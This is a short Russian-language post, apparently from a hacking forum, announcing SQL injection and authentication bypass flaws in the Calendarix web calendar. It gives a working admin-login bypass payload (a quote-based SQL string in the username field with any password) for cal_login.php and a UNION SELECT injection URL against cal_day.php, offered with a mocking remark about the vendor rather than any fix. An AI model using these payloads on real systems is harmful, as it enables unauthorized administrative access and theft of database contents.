• XSS.stack #1 – первый литературный журнал от юзеров форума

Web Уязвимости: Calendarix

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
Calendarix SQL Injection & Authorization Bypass Vulnerabilities
Хех, классика жанра. Неужели людей история не учит?

http://host/calendarix/admin/cal_login.php
username: ' or 1/*
password: any

Да и к тому же вот такая инъекция:
Код:
http://host/calendarix/cal_day.php? op=day&date=2006-01-10&catview=99% 20union%20select% blabla
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх